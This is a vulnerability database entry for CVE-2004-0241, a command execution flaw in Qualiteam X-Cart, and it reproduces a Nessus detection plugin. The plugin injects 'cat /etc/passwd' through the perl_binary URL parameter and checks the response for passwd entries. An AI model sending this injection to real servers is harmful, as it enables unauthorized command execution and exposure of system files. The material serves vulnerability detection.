Vulnerabilities > CVE-2004-0241 - Remote Command Execution vulnerability in Qualiteam X-Cart

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
qualiteam
critical
nessus
exploit available
NVD
Published: 2004-11-23
Updated: 2017-07-11

Summary

X-Cart 3.4.3 allows remote attackers to execute arbitrary commands via the perl_binary argument in (1) upgrade.php or (2) general.php.

Vulnerable Configurations

Part Description Count
Application
Qualiteam
7

Exploit-Db

  • descriptionQualiteam X-Cart 3.x upgrade.php perl_binary Parameter Arbitrary Command Execution. CVE-2004-0241. Webapps exploit for php platform
    idEDB-ID:23637
    last seen2016-02-02
    modified2004-02-03
    published2004-02-03
    reporterPhilip
    sourcehttps://www.exploit-db.com/download/23637/
    titleQualiteam X-Cart 3.x upgrade.php perl_binary Parameter Arbitrary Command Execution
  • descriptionQualiteam X-Cart 3.x general.php perl_binary Parameter Arbitrary Command Execution. CVE-2004-0241. Webapps exploit for php platform
    idEDB-ID:23636
    last seen2016-02-02
    modified2004-02-03
    published2004-02-03
    reporterPhilip
    sourcehttps://www.exploit-db.com/download/23636/
    titleQualiteam X-Cart 3.x general.php perl_binary Parameter Arbitrary Command Execution

Nessus

NASL familyCGI abuses
NASL idQUALITEAM_XCART_CMD_EXEC.NASL
descriptionThe remote host is running Qualiteam X-Cart - a shopping cart software written in PHP. There is a bug in this software that could allow an attacker to execute arbitrary commands on the remote web server with the privileges of the web user. In addition to this, there are some flaws that could allow an attacker to obtain more information about the remote server, like the physical location of the remote web root.
last seen2020-06-01
modified2020-06-02
plugin id12040
published2004-02-03
reporterThis script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/12040
titleQualiteam X-Cart Multiple Script perl_binary Parameter Arbitrary Command Execution
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(12040);
 script_version ("1.21");
 script_cve_id("CVE-2004-0241");
 script_bugtraq_id(9560);
 
 script_name(english:"Qualiteam X-Cart Multiple Script perl_binary Parameter Arbitrary Command Execution");
 
 script_set_attribute(attribute:"synopsis", value:
"Arbitrary commands can be run on the remote server." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Qualiteam X-Cart - a shopping cart software 
written in PHP.

There is a bug in this software that could allow an attacker to execute
arbitrary commands on the remote web server with the privileges of the
web user.  In addition to this, there are some flaws that could allow
an attacker to obtain more information about the remote server, like
the physical location of the remote web root." );
 script_set_attribute(attribute:"solution", value:
"Upgrade to the latest version of blog.cgi or disable this software." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"plugin_publication_date", value: "2004/02/03");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/02/03");
 script_cvs_date("Date: 2018/07/26 13:32:42");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
 script_summary(english:"Checks Qualiteam X-Cart");
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_dependencie("webmirror.nasl", "http_version.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 script_require_keys("www/PHP");
 exit(0);
}

#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

if(!can_host_php(port:port))exit(0);

foreach dir (cgi_dirs())
{
 u = string(dir,"/admin/general.php?mode=perlinfo&config[General][perl_binary]=cat%20/etc/passwd||");
 r = http_send_recv3(method: "GET", item: u, port:port);
 if (isnull(r)) exit(0);

 if(egrep(pattern:".*root:.*:0:[01]:.*", string: r[0]+r[1]+r[2]))
 {
   if (report_verbosity < 1)
     security_hole(port);
   else
     security_hole(port, extra:
strcat('\nThe following URL exhibits the flaw :\n\n', build_url(port: port, qs: u), '\n'));
   exit(0);
 }
}

References